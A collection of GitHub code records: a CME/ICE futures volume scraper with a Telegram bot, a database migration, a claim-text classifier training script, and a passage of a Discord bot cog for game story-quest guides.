checkTradeDate()\")\n tradeDate_data = response.json() #Data von Url Json\n \n return tradeDate_data\n \ndef printProgressBar(progress):\n\n ####\n # Function that prints the Progress Bar\n ####\n\n print(\"[\", end=\"\")\n\n for i in range(0 , 100):\n if(i < progress): print(\"=\", end=\"\")\n if(i > progress): print(\"-\" , end=\"\")\n\n \n print(\"]\")\n \ndef botrun():\n ### Bot Function ###\n updater = Updater(keys.API_KEY, use_context=True)\n dp = updater.dispatcher\n\n dp.add_handler(CommandHandler(\"start\", start_command))\n dp.add_handler(CommandHandler(\"help\", help_command))\n dp.add_handler(CommandHandler(\"craw\", craw_command))\n dp.add_handler(CommandHandler(\"log\", log_command ))\n dp.add_handler(CommandHandler(\"clear\", clear_command ))\n\n dp.add_handler(MessageHandler(Filters.text, hanlde_message))\n\n dp.add_error_handler(error)\n\n updater.start_polling(5)\n ######\n\ndef main(sc , param = False):\n #bot = telegram.Bot(keys.API_KEY)\n\n ############\n # Main Function\n # Traversing all Datasets (/data/...json)\n ############\n\n\n logging.info(\"Start Process CRAW\")\n #bot.send_message(chat_id=\"2143240853\" ,text=\"Craw gestartet!\")\n dataName_array = [\"Currencies\", \"Energies\" , \"Equities\" , \"Financials\" , \"Grains\" , \"Meats\" , \"Metals\" , \"Softs\"]\n\n #### Standard Werte###\n b = 0\n progress = 0.0\n isCme = False\n ######################\n\n BeautifulPrintouts(\"start\")\n \n inc = 4 #Increment in Google Sheets??\n ch = 'B' #Used for GoogleSheets Table\n\n #For Schleife -> Gehe durch Datensätze (in Data ordner)\n for b in range (0, 8):\n\n inc = 4 #Excel\n\n\n with open(\"data/\" + dataName_array[b] + \".json\") as f:\n info_data = json.load(f)\n\n print(\"Fetching: \" + dataName_array[b] + \".json\")\n\n printProgressBar(progress)\n\n print(\"Progress: \" + str(progress) + \"%\\n\")\n\n\n for l in range(0 , len(info_data[\"infoData\"])):\n #####\n # Traversing through infoData from .json Datasets\n #####\n\n # 
Retries #\n            # Reset every new Dataset # \n            retries = 1\n            success = False\n\n            rangeS = \"Kontraktvolumen!\" + str(ch) + str(inc) # name of the target sheet on Google Sheets\n            \n            progress = round(progress + (12.5/len(info_data[\"infoData\"])), 2)\n\n            if(info_data[\"infoData\"][l][\"from\"] == \"theice\"): \n                #####################\n                # Is this a TheIce url?\n                # Get the data and save it in the data_ice variable\n                #####################\n\n                isCme = False\n\n                params_ice = {\n                    \"getContractsAsJson\": \"\",\n                    \"productId\": info_data[\"infoData\"][l][\"url-id\"], \n                    \"hubId\": info_data[\"infoData\"][l][\"hub-id\"], \n                } \n\n                url_ice = \"https://www.theice.com/marketdata/DelayedMarkets.shtml?\"\n                while not success:\n                    try: #TheIce\n                        response_Ice = requests.get(url_ice, params=params_ice, headers=headers)\n                        response_Ice.raise_for_status()\n                        data_ice = response_Ice.json() # data from the URL as JSON\n                        success = True\n                    except requests.exceptions.Timeout:\n                        print(\"timeOut - TheICE - Main()\")\n                        wait = retries*30\n                        logging.warning(\"Exception occured - Timeout - ICE - Main() - Retrying: \" + str(retries) + \" Seconds \" + str(wait))\n                        # logging.exception(\"Exception occured - Timeout - ICE - Main() - Retrying: \" + str(retries) + \"Seconds \" + str(wait))\n                        time.sleep(wait)\n                        retries += 1 \n                    except requests.exceptions.ConnectionError:\n                        print(\"ConnErr - TheIce - Main()\")\n                        wait = retries*30\n                        logging.warning(\"Exception occured (conn err) - Connect to TheICE - Main() - Retrying: \" + str(retries) + \" Seconds \" + str(wait))\n                        # logging.exception(\"Exception occured (conn err) - Connect to TheICE - Main() - Retrying: \" + str(retries) + \"Seconds \" + str(wait))\n                        time.sleep(wait)\n                        retries += 1 \n                    except requests.exceptions.HTTPError:\n                        print(\"BadGateway - TheICE - Main()\")\n                        wait = retries*30\n                        logging.warning(\"Exception occured (Bad Gateway) - Test? - TheICE - Main() - Retrying:\" + str(retries) + \" Seconds\" + str(wait))\n                        # logging.exception(\"Exception occured (Bad Gateway) - Test? 
- TheICE - Main() - Retrying:\" + str(retries) + \"Seconds\" + str(wait))\n                        time.sleep(wait)\n                        retries += 1 \n\n\n\n            if(info_data[\"infoData\"][l][\"from\"] == \"cme\"): \n                #####################\n                # Is this a cme url?\n                # Get the data and save it into the data_Cme variable\n                # Calls CheckTradeDate Function to prevent saving empty Dataset to variable\n                #####################\n\n                params = {\n                    \"tradeDate\": tradeDate, \n                    \"pageSize\": \"50\",\n                    \"_\": \"1620683546888\"\n                }\n\n                url_id = (info_data[\"infoData\"][l][\"url-id\"])\n\n                url = \"https://www.cmegroup.com/CmeWS/mvc/Volume/Details/F/\"+ url_id +\"/\" + tradeDate + \"/P\"\n                print(url)\n\n                while not success:\n                    try: #CME-Group\n                        response = requests.get(url, params=params, headers=headers) #URL\n                        response.raise_for_status()\n                        data_Cme_NC = response.json() # data from the URL as JSON\n                        data_Cme = checkTradeDate(data_Cme_NC, tradeDate, url_id, params)\n                        success = True\n                    except requests.exceptions.Timeout:\n                        wait = retries * 30\n                        logging.warning(\"Exception occured (timeout) - Connect to CME - Main() - Retries: \" + str(retries) + \" Wait: \" + str(wait) )\n                        # logging.exception(\"Exception occured (timeout) - Connect to CME - Main() - Retries: \" + str(retries) + \"Wait: \" + str(wait) )\n                        time.sleep(wait)\n                        retries += 1\n                        print(\"time-out\")\n                    except requests.exceptions.ConnectionError:\n                        wait = retries * 30\n                        logging.warning(\"Exception occured (conn err) - Connect to CME - Main() - Retries: \" + str(retries) + \" Wait: \" + str(wait))\n                        # logging.exception(\"Exception occured (conn err) - Connect to CME - Main() - Retries: \" + str(retries) + \"Wait: \" + str(wait))\n                        time.sleep(wait)\n                        retries += 1 \n                        print('Connection Error')\n                    except requests.exceptions.HTTPError:\n                        wait = retries * 30\n                        logging.warning(\"Exception occured (Bad Gateway) - Test? - CME - Main() - Retries: \" + str(retries) + \" Wait: \" + str(wait))\n                        # logging.exception(\"Exception occured (Bad Gateway) - Test? 
- CME - Main() - Retries: \" + str(retries) + \"Wait: \" + str(wait))\n                        time.sleep(wait)\n                        retries += 1\n                        print(\"BadGateway - CME - Main()\")\n                \n\n\n            isCme = True\n\n            name = info_data[\"infoData\"][l][\"name\"]\n            i = 0 # reset the month loop counter\n            aoa = [[name], [\"MONAT\", \"TOTAL\"]] # Array for Data -> initialized with Name, l.377,387 append Data of ICE/CME\n\n            while i < 5:\n                # Traversing through Data of ICE/CME\n                if(isCme == True):\n                    if i == len(data_Cme[\"monthData\"]): # exit when there are no more months in the array\n                        break\n\n                    month = data_Cme[\"monthData\"][i][\"month\"]\n                    totalVolume = data_Cme[\"monthData\"][i][\"totalVolume\"]\n                    arrayMonat = [month, totalVolume]\n                    aoa.append(arrayMonat) # Append Month to aoa Array (Array of Data)\n\n                \n                if(isCme == False):\n                    if i == len(data_ice): # exit when there are no more months in the array \n                        break\n\n                    month = data_ice[i][\"marketStrip\"]\n                    totalVolume = data_ice[i][\"volume\"]\n                    arrayMonat = [month, totalVolume]\n                    aoa.append(arrayMonat) # Append Month to aoa Array (Array of Data)\n\n\n                i = i + 1 #Increment\n\n            inc = inc + 8\n\n            #Write aoa to GoogleSheet\n            # Should another retry block go here too?\n            try:\n                request = sheet.values().update(spreadsheetId=SAMPLE_SPREADSHEET_ID, \n                    range=rangeS ,valueInputOption=\"USER_ENTERED\", body={\"values\": aoa}).execute()\n            except: \n                logging.exception(\"Connection error - could not be pushed to sheet\")\n            \n            i = 0 # reset for the next iteration\n\n        ch = chr(ord(ch) + 3) # column increment in the Google Sheet (-> each dataset sits side by side: B becomes B+3=E)\n\n    BeautifulPrintouts(\"end\")\n    #bot.send_message(chat_id=\"2143240853\" ,text=\"Craw beendet!\")\n    logging.info(\"Finished Process CRAW\")\n    if(param == False):\n        s.enter(3600, 1, main, (sc,)) #Run every hour\n    \n    \n\nbotrun()\n##Start after 5 SEC ###############\ns.enter(5, 1, main, (s,False))\ns.run()\n#################################\n\n# Notifier on crash (only in the log right now)\n#BOT\n    #Clear Log\n    #Last run\n    #Next run?\n","repo_name":"PaulKalho/Craw","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":19719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
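The trade-date setup near the top of this script reduces to a small pure function; below is a sketch of the same weekend rollback rule, easier to test in isolation (`last_trading_date` is an illustrative name, not from the script):

```python
from datetime import datetime, timedelta

def last_trading_date(now=None):
    """Yesterday's date as YYYYMMDD, rolled back to Friday when it falls on a weekend."""
    d = (now or datetime.now()) - timedelta(days=1)
    if d.weekday() == 5:        # Saturday -> Friday
        d -= timedelta(days=1)
    elif d.weekday() == 6:      # Sunday -> Friday
        d -= timedelta(days=2)
    return d.strftime('%Y%m%d')

print(last_trading_date(datetime(2022, 5, 2)))  # '20220429': Sunday rolls back to Friday
```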
+{"seq_id":"34621001295","text":"\"\"\"coordinates column added\n\nRevision ID: 335ad9825bf5\nRevises: cb2613ae9f03\nCreate Date: 2020-10-08 06:02:44.414627\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"335ad9825bf5\"\ndown_revision = \"cb2613ae9f03\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"gmaps_business\", sa.Column(\"coordinates\", sa.Text(), nullable=True)\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"gmaps_business\", \"coordinates\")\n # ### end Alembic commands ###\n","repo_name":"sintimaski/bfs-be","sub_path":"migrations/versions/335ad9825bf5_coordinates_column_added.py","file_name":"335ad9825bf5_coordinates_column_added.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10974211884","text":"import sys\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.externals import joblib\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\ndf = pd.read_csv(sys.argv[1], index_col=0)\n\n\n# Long strings are usually a sign of bad data so lets stick to fewer than 300 characters for training.\ndf = df[df['CLMANT_TXT'].str.len() < 300]\n\n\n# Lets separate data points that dont have an approve label from our dataset.\ndfOut = df[(~df['CLMANT_TXT'].isnull()) & (df['newClass'].isnull())]\ndf = df[(~df['CLMANT_TXT'].isnull()) & (~df['newClass'].isnull())]\n\nprint('\\n')\nprint('vectorizing text')\nprint('\\n')\n\n# Initialize a Count Vectorizer with a minimum of 10 appearance of a word for significance, \n# english stopwords and up to 3 word ngrams.\nvectorizer = CountVectorizer(min_df=10, ngram_range=(1,3), stop_words='english') \n\n# define the features\nX = df['CLMANT_TXT']\n\n#This are the labels we are trying to predict\ny = np.array(df['newClass'])\n\n# Split into a training and testing set.\nX_train, X_test, y_train, y_test, i_train, i_test = train_test_split(X, y, df.index, test_size=0.7, random_state=42)\n\nprint('\\n')\nprint('Training model. This may take a while and there might be a few warnings but dont worry, it will work.')\nprint('\\n')\n\n# create the feature space\n# fit_transform to learn from only the training data\n# transform to apply the learned features from the training data to the test data\nX_train = vectorizer.fit_transform(X_train)\nX_test = vectorizer.transform(X_test)\n\n# Initialize a Logistic Regression Model.\nclf = LogisticRegression(multi_class='ovr', solver='lbfgs', n_jobs=-1, max_iter=1000)\n\n# Train a model\nclf.fit(X_train, y_train)\n\n# Measure accuracy\ny_pred = clf.predict(X_test)\n\nscore = str(clf.score(X_test, y_test))\n\nprint('our models accuracy is: ' + score)\n\nprint('\\n')\n\n# Measure presicion, recall, f1 score\nprint('our models weighted precision, recall and f1score are as follows: ')\nprint(precision_recall_fscore_support(y_test, y_pred, average='weighted'))\n\nprint('\\n')\n\n# get codes for prediction\ndfLabels = pd.read_excel('../data/Contention_Dictionary.xlsx')\ndLabels = {}\nfor index, row in dfLabels.iterrows():\n dLabels[row['New Contention Classification Text'].lower().strip()] = row['IDs']\n\n# Saving the test run.\ndf1 = df[['CLMANT_TXT', 'CNTNTN_CLSFCN_ID', 'CNTNTN_CLSFCN_TXT', 'newClass']].loc[i_test]\ndf1['predictedLabel'] = y_pred\ndf1['predID'] = df1.apply(lambda x: dLabels[x['predictedLabel']], 1)\ndf1['correctPred'] = df1.apply(lambda x: int(x['newClass'] == x['predictedLabel']), 1)\ndf1.to_csv('../data/testResults.csv')\n\n# build the final model\n# after feature engineering, model selection, and hyperparameter tuning is complete\n# use all available data to maximize the use of data for the final classifier\n# i.e. 
fit the vectorizer and classifier on all of X (not only X_train)\n# since no further experimentation is occurring\nX_vect = vectorizer.fit_transform(X)\nclf = LogisticRegression(multi_class='ovr', solver='lbfgs', n_jobs=-1, max_iter=1000)\nclf.fit(X_vect, y)\n\n# save the vectorizer object as vectorizer.pkl\njoblib.dump(vectorizer, filename='../modelsAndTransformations/vectorizer.pkl')\n\n# save the classifier object as LRclf.pkl\njoblib.dump(clf, filename='../modelsAndTransformations/LRclf.pkl')\n\n# Running data with bad labels through the model.\nprint('Predicting on data with unidentified labels. Saved in ../data/predictionOnDataWithBadLabels.csv')\ndfBad = vectorizer.transform(dfOut['CLMANT_TXT'])\npBad = clf.predict(dfBad)\ndfOut['predLabel'] = pBad\ndfOut['predID'] = dfOut.apply(lambda x: dLabels[x['predLabel']], 1)\ndfOut.to_csv('../data/predictionOnDataWithBadLabels.csv')\n\nprint('Done. A copy of the test results has been saved to testResults.csv in the data folder')\n","repo_name":"BGebken/Linnaeus-Classifier","sub_path":"preppingScripts/modelBuilder.py","file_name":"modelBuilder.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
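Once `vectorizer.pkl` and `LRclf.pkl` are on disk, scoring new claim text is load, transform, predict. A minimal inference sketch using the same paths and import style as the script; the sample claim string is made up:

```python
from sklearn.externals import joblib  # matches the (older) import style used in the script

vectorizer = joblib.load('../modelsAndTransformations/vectorizer.pkl')
clf = joblib.load('../modelsAndTransformations/LRclf.pkl')

claims = ['knee condition due to injury during service']
X_new = vectorizer.transform(claims)   # reuse the fitted vocabulary; never refit at inference
print(clf.predict(X_new)[0])           # predicted contention label
print(clf.predict_proba(X_new).max())  # confidence of the top class
```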
+{"seq_id":"27011712130","text":"import discord\r\nimport aiohttp\r\nimport urllib, json #For fetching JSON from alliancewar.com\r\nimport os\r\nimport requests\r\nimport re\r\nimport json\r\nfrom .utils.dataIO import dataIO\r\nfrom .utils import chat_formatting as chat\r\nfrom collections import defaultdict, ChainMap, namedtuple, OrderedDict\r\n\r\nfrom discord.ext import commands\r\nfrom __main__ import send_cmd_help\r\nfrom cogs.mcocTools import (StaticGameData, PagesMenu, KABAM_ICON, COLLECTOR_ICON, CDTHelperFunctions, GSHandler, CDT_COLORS)\r\nfrom cogs.mcocTools import (SearchExpr, P0Expr, ParenExpr, SearchNumber, SearchPhrase, ExplicitKeyword, SearchNumber, SearchWord, SearchPhrase) #search stuff\r\nfrom cogs.mcoc import ChampConverter, ChampConverterDebug, Champion\r\n\r\nGSHEET_ICON = 'https://d2jixqqjqj5d23.cloudfront.net/assets/developer/imgs/icons/google-spreadsheet-icon.png'\r\nACT6_SHEET = 'https://docs.google.com/spreadsheets/d/1xTw37M_fwYClNfgvi7-09M6MLIcgMziTfM5_MGbAs0Q/view'\r\nREBIRTH = 'https://cdn.discordapp.com/attachments/398210253923024902/556216721933991936/46BBFB298E7EEA7DD8A5A1FAC65FBA621A6212B5.jpg'\r\nPATREON = 'https://patreon.com/collectorbot'\r\n\r\nclass STORYQUEST:\r\n EmojiReact = namedtuple('EmojiReact', 'emoji include path text')\r\n\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.search_parser = SearchExpr.parser()\r\n self.gsheet_handler = GSHandler(bot)\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_glossary',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_glossary.json',\r\n sheet_name='glossary',\r\n range_name='glossary_export'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_export',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_export.json',\r\n sheet_name='export',\r\n range_name='export'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_paths',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_paths.json',\r\n sheet_name='paths',\r\n range_name='paths'\r\n )\r\n self.gsheet_handler.register_gsheet(\r\n name='cdt_globals',\r\n gkey='1Up5SpQDhp_SUOb5UFuD6BwkVKsJ4ZKN13DHHNJrNrEc',\r\n local='data/storyquest/cdt_globals.json',\r\n sheet_name='globals',\r\n range_name='globals'\r\n )\r\n try:\r\n self.glossary = dataIO.load_json('data/storyquest/cdt_glossary.json')\r\n self.glossary_desc = dataIO.load_json('data/storyquest/cdt_glossary_desc.json')\r\n self.glossary_tips = dataIO.load_json('data/storyquest/cdt_glossary_tips.json')\r\n self.glossary_keys = dataIO.load_json('data/storyquest/cdt_glossary_keys.json')\r\n self.export = dataIO.load_json('data/storyquest/cdt_export.json')\r\n self.paths = dataIO.load_json('data/storyquest/cdt_paths.json')\r\n self.globals = dataIO.load_json('data/storyquest/cdt_globals.json')\r\n except:\r\n self.glossary = {}\r\n self.glossary_tips = {}\r\n self.glossary_keys = {}\r\n self.glossary_desc = {}\r\n self.export = {}\r\n self.paths = {}\r\n self.globals = {}\r\n self.all_emojis = OrderedDict([(i.emoji, i) for i in (\r\n self.EmojiReact(\"0⃣\", 0, 'path0', ':zero:'),\r\n self.EmojiReact(\"1⃣\", 1, 'path1', ':one:'),\r\n self.EmojiReact(\"2⃣\", 2, 'path2', ':two:'),\r\n self.EmojiReact(\"3⃣\", 3, 'path3', ':three:'),\r\n self.EmojiReact(\"4⃣\", 4, 'path4', ':four:'),\r\n self.EmojiReact(\"5⃣\", 5, 'path5', ':five:'),\r\n self.EmojiReact(\"6⃣\", 6, 'path6', ':six:'),\r\n self.EmojiReact(\"7⃣\", 7, 'path7', ':seven:'),\r\n self.EmojiReact(\"8⃣\", 8, 
'path8', ':eight:'),\r\n            self.EmojiReact(\"9⃣\", 9, 'path9', ':nine:'),\r\n            self.EmojiReact(\"🔟\", 10, 'path10', ':keycap_ten:'),\r\n        )])\r\n\r\n    async def _load_sq(self, force=False):\r\n        if self.glossary == {} or self.export == {} or force is True:\r\n            await self.gsheet_handler.cache_gsheets('cdt_glossary')\r\n            await self.gsheet_handler.cache_gsheets('cdt_export')\r\n            await self.gsheet_handler.cache_gsheets('cdt_paths')\r\n            await self.gsheet_handler.cache_gsheets('cdt_globals')\r\n            temp = dataIO.load_json('data/storyquest/cdt_glossary.json')\r\n            glossary_keys = {}\r\n            glossary_tips = {}\r\n            glossary_desc = {}\r\n            # glossary_titles = {}\r\n            for t in temp.keys():\r\n                if t not in ('', '-', '_headers'):\r\n                    glossary_desc.update({t: temp[t]['description']})\r\n                    glossary_tips.update({t: temp[t]['tips']})\r\n                    glossary_keys.update({t: temp[t]['title']})\r\n                    # glossary_titles.update({t: temp[t]['title']})\r\n            self.glossary_desc = glossary_desc\r\n            self.glossary_keys = glossary_keys\r\n            self.glossary_tips = glossary_tips\r\n            # self.glossary_titles = glossary_titles\r\n            self.glossary = temp\r\n            dataIO.save_json('data/storyquest/cdt_glossary.json', self.glossary)\r\n            dataIO.save_json('data/storyquest/cdt_glossary_desc.json', self.glossary_desc)\r\n            dataIO.save_json('data/storyquest/cdt_glossary_keys.json', self.glossary_keys)\r\n            dataIO.save_json('data/storyquest/cdt_glossary_tips.json', self.glossary_tips)\r\n            # dataIO.save_json('data/storyquest/cdt_glossary_titles.json', self.glossary_titles)\r\n            # self.glossary_keys = dataIO.load_json('data/storyquest/cdt_glossary_keys.json')\r\n            self.export = dataIO.load_json('data/storyquest/cdt_export.json')\r\n            self.paths = dataIO.load_json('data/storyquest/cdt_paths.json')\r\n            self.globals = dataIO.load_json('data/storyquest/cdt_globals.json')\r\n\r\n        return\r\n\r\n    @commands.group(pass_context=True, aliases=('sq',))\r\n    async def storyquest(self, ctx):\r\n        \"\"\"[BETA]: Story Quest\r\n        Supporting Act 6.1.x\r\n        Boost Glossary & Paths\"\"\"\r\n\r\n        if ctx.invoked_subcommand is None:\r\n            await send_cmd_help(ctx)\r\n\r\n    @storyquest.command(hidden=True, name='fetch')\r\n    async def _fetch(self):\r\n        await self._load_sq(force=True)\r\n\r\n    @commands.command(pass_context=True, name='glossary', aliases=('boost',))\r\n    async def _boost_info(self, ctx, *, boost=None):\r\n        \"\"\"Story Quest Glossary\r\n        Supporting Act 5 & Act 6 node boosts.\"\"\"\r\n        keys = []\r\n        for k in self.glossary.keys():\r\n            if k != \"-\" and k != \"_headers\" and k != \"\":\r\n                keys.append(k)\r\n        keys = sorted(keys)\r\n        author = ctx.message.author\r\n        if ctx.message.channel.is_private:\r\n            ucolor = discord.Color.gold()\r\n        else:\r\n            ucolor = author.color\r\n        # guard against boost=None before calling .lower(), otherwise a bare command crashes\r\n        if boost is not None and boost.lower() not in keys:\r\n            for k in keys:\r\n                if self.glossary[k]['title'].lower() == boost.lower():\r\n                    boost = k\r\n                    continue\r\n\r\n        if boost is not None and boost.lower() in keys:\r\n            data = discord.Embed(color=ucolor, title='{}'.format(self.glossary[boost.lower()]['title']), description='', url=PATREON)\r\n            data.set_thumbnail(url=COLLECTOR_ICON)\r\n            data.set_author(name='Support CollectorDevTeam')\r\n            data.set_thumbnail(url=REBIRTH)\r\n            # data.set_author(name='Glossary by StarFighter + DragonFei + Royal', icon_url=GSHEET_ICON)\r\n            data.set_footer(\r\n                text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n                icon_url=GSHEET_ICON)\r\n            data.description = self.glossary[boost.lower()]['description']\r\n            if self.glossary[boost.lower()]['tips'] != \"\":\r\n                
data.add_field(name='CollectorVerse Tips', value=self.glossary[boost.lower()]['tips'])\r\n await self.bot.say(embed=data)\r\n return\r\n elif boost is None:\r\n pages = []\r\n glossary = ''\r\n for key in keys:\r\n try:\r\n glossary += '__{}__\\n{}\\n\\n'.format(key.title(), self.glossary[key]['description'])\r\n except KeyError:\r\n raise KeyError('Cannot resolve {}'.format(boost.lower()))\r\n glossary = chat.pagify(glossary)\r\n for g in glossary:\r\n data = discord.Embed(color=ucolor, title='Story Quest Boost Glossary', description=g, url=ACT6_SHEET)\r\n data.set_thumbnail(url=REBIRTH)\r\n # data.set_author(name='Glossary by StarFighter + DragonFei + Royal', icon_url=GSHEET_ICON)\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n pages.append(data)\r\n if len(pages) > 0:\r\n menu = PagesMenu(self.bot, timeout=120, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n else:\r\n result = self.search_parser.parse_string(boost)\r\n print(result.elements)\r\n matches = result.match(self.glossary_desc, self.glossary_keys)\r\n package = []\r\n for k in sorted(matches):\r\n package.append('\\n__{}__\\n{}'.format(\r\n self.glossary[k]['title'], self.glossary[k]['description']))\r\n pages = chat.pagify('\\n'.join(package))\r\n page_list = []\r\n for page in pages:\r\n data = discord.Embed(title='Support CollectorDevTeam', description=page, color=ucolor, url=PATREON)\r\n data.set_thumbnail(url=COLLECTOR_ICON)\r\n data.set_author(name='Glossary Search: [{}]'.format(boost.lower()))\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n page_list.append(data)\r\n menu = PagesMenu(self.bot, timeout=120, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(page_list)\r\n return\r\n\r\n\r\n # if boost in boost_keys:\r\n # await self.bot.say('debug: boost found')\r\n # await self.bot.say(self.glossary[boost]['description'])\r\n # else:\r\n # await self.bot.say('boost not found '\r\n # 'available boosts')\r\n\r\n @commands.command(pass_context=True, name='act', aliases=('sq path',))\r\n async def _paths(self, ctx, map=None, path=None, verbose=True):\r\n \"\"\"[BETA] Story Quest\r\n Act 6 Fights\r\n maps: 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.1.5, 6.1.6\r\n paths: path1 to path10\r\n verbose: If true, will play all fights sequentially\r\n \"\"\"\r\n author = ctx.message.author\r\n ucolor = discord.Color.gold()\r\n if ctx.message.channel.is_private is False:\r\n ucolor = author.color\r\n data = discord.Embed(color=ucolor, title='Story Quest Help', description='')\r\n starfire_maps = ('6.1.1', '6.1.2', '6.1.3', '6.1.4', '6.1.5', '6.1.6')\r\n valid_maps = []\r\n for k in self.paths.keys():\r\n if k != '_headers' and k != 'emoji' and k != 'map' and 'rttl_' not in k:\r\n valid_maps.append(k)\r\n valid_maps.sort()\r\n if map not in valid_maps or map is None:\r\n message = 'Select a valid map:\\n'\r\n message += '5.3: 5.3.1, 5.3.2, 5.3.3, 5.3.4, 5.3.5, 5.3.6\\n'\r\n message += '5.4: 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.4.5, 5.4.6\\n'\r\n message += '6.1: 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.1.5, 6.1.6\\n'\r\n message += '6.2: N/A\\n'\r\n # message += '6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.2.5, 6.2.6\\n'\r\n # message += ', '.join(valid_maps)\r\n data.description = message\r\n await self.bot.say(embed=data)\r\n return\r\n\r\n all_paths = self.paths['_headers']['paths']\r\n all_paths = list(filter(lambda a: a != '', 
all_paths)) #remove \"\" from valid paths\r\n valid_paths = []\r\n for a in all_paths:\r\n if a in self.paths[map].keys() and self.paths[map][a] != \"\":\r\n valid_paths.append(a)\r\n\r\n if path not in valid_paths and path is not None:\r\n if \"path{}\".format(path) in valid_paths:\r\n path = \"path{}\".format(path)\r\n else:\r\n return\r\n\r\n if path is None or path not in valid_paths:\r\n attrs = {}\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n if self.globals[map]['chapter_champ'] != '':\r\n boss = await ChampConverter.get_champion(self, self.bot, self.globals[map]['chapter_champ'], attrs)\r\n data.title = 'Map {}\\nAct: {}\\nChapter: {}\\nQuest: {}'.\\\r\n format(map, self.globals[map]['act_title'],\r\n self.globals[map]['chapter_title'],\r\n self.globals[map]['quest_title'])\r\n data.set_thumbnail(url=boss.get_avatar())\r\n print(valid_paths)\r\n data.set_image(url=self.globals[map]['chapter_image'])\r\n\r\n\r\n for p in valid_paths:\r\n if p is not None and p != \"\":\r\n key = '{}-{}-1'.format(map, p)\r\n for emoji in self.all_emojis.values():\r\n if emoji.path == p:\r\n data.add_field(name=emoji.text, value='Quest: {}\\nTiles: {}\\nEnergy: {}\\nNotes: {}\\n'\r\n .format(p[-1:],self.export[key]['tiles'],\r\n self.export[key]['tiles']*3,\r\n self.export[key]['notes']))\r\n continue\r\n description = ''\r\n gboosts = self.export[key]['global'].split(', ')\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n # description += 'Global: {}\\n{}\\n\\n'.format(self.glossary_titles[g], self.glossary_desc[g])\r\n data.add_field(name='Global Boost: {}'.format(self.glossary_keys[g].title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n # data.description=description\r\n message = await self.bot.say(embed=data)\r\n self.included_emojis = set()\r\n for emoji in self.all_emojis.values():\r\n if emoji.path in valid_paths:\r\n try:\r\n print(emoji.emoji)\r\n await self.bot.add_reaction(message, emoji.emoji)\r\n except:\r\n raise KeyError('Unknwon Emoji : {}'.format(emoji.emoji))\r\n self.included_emojis.add(emoji.emoji)\r\n react = await self.bot.wait_for_reaction(message=message, user=ctx.message.author,\r\n timeout=30, emoji=self.included_emojis)\r\n if react is None:\r\n try:\r\n await self.bot.clear_reactions(message)\r\n except discord.errors.NotFound:\r\n # logger.warn(\"Message has been deleted\")\r\n print('Message deleted')\r\n except discord.Forbidden:\r\n # logger.warn(\"clear_reactions didn't work\")\r\n for emoji in self.included_emojis:\r\n await self.bot.remove_reaction(message, emoji, self.bot.user)\r\n return\r\n emoji = react.reaction.emoji\r\n path = self.all_emojis[emoji].path if emoji in self.all_emojis else None\r\n\r\n if path in valid_paths:\r\n tiles = self.paths[map][path]\r\n tiles = tiles.split(',')\r\n pages = []\r\n i = 1\r\n for tile in tiles:\r\n key = '{}-{}-{}'.format(map, path, tile)\r\n attrs = {}\r\n mob = self.export[key]['mob'].lower()\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n champion = await ChampConverter.get_champion(self, self.bot, mob, attrs)\r\n power = self.export[key]['power']\r\n hp = self.export[key]['hp']\r\n boosts = self.export[key]['boosts'].split(', ')\r\n gboosts = self.export[key]['global'].split(', ')\r\n notes = self.export[key]['notes']\r\n # attack = self.export[key]['attack']\r\n data = discord.Embed(color=CDT_COLORS[champion.klass], title='Act {} Path {} | Fight {}'.format(map, path[-1:], i),\r\n 
